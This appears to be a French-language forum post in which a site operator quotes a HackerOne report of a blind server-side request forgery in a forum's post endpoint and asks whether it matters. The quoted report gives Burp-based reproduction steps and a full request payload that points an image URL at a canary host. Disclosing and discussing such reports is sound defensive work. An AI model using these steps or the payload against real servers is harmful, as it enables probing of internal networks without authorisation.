Nous avons reçu un rapport Hackerone concernant le problème ci-dessous.
Ce que je me demande, c’est :
- Est-ce un problème ?
- Y a-t-il des suggestions / quelque chose que je peux faire à ce sujet ?
Résumé :
Bonjour, j’ai trouvé un SSRF aveugle sur le point de terminaison
hxxps://xyz.com/postsÉtapes pour reproduire :
- Connectez-vous à votre compte sur xyz.com
- Allez dans les messages privés (il y aura un message de bienvenue de leur discobot)
- Lors de l’envoi d’un message, téléchargez une image et interceptez la requête dans Burp
- Dans la charge utile, changez l’URL de téléchargement de l’image en votre URL de canari
- La charge utile ressemblera à ceci :
raw=![svg_image|690x388]>(hxxp://canarytokens.com/tags/images/terms/ctw75qckq1htf6n3rt9asrpn3/submit.aspx) &unlist_topic=false&category=&topic_id=1659497&is_warning=false&whisper=false&archetype=regular&composer_open_duration_msecs=12597&featured_link=&shared_draft=false&draft_key=topic_1659497&reply_to_post_number=83&image_sizes[hxxps://xyz.cloudfront.net/uploads/default/original/4X/c/a/9/ca90daba5408ce8b8693f3a5d58e537eb750e906.svg][width]=5120&image_sizes[hxxps://xyz.cloudfront.net/uploads/default/original/4X/c/a/9/ca90daba5408ce8b8693f3a5d58e537eb750e906.svg][height]=2880&nested_post=true
- Lorsque vous envoyez la requête, deux alertes de canari seront déclenchées ou vérifiez les journaux du serveur, il y aura une requête effectuée par un agent utilisateur Ruby et une autre à partir de leur instance Amazon Compute
Impact
La vulnérabilité permet à un attaquant d’effectuer des requêtes HTTP/HTTPS arbitraires à l’intérieur du réseau d’une instance xyz.com.
D’après ce fil, il semble que cela soit dû au comportement de “onebox” Server-side request forgery vulnerability.
J’ai également vu ce rapport Hackerone d’il y a des années SSRF dans le téléchargement d’IMG via URL.
Merci !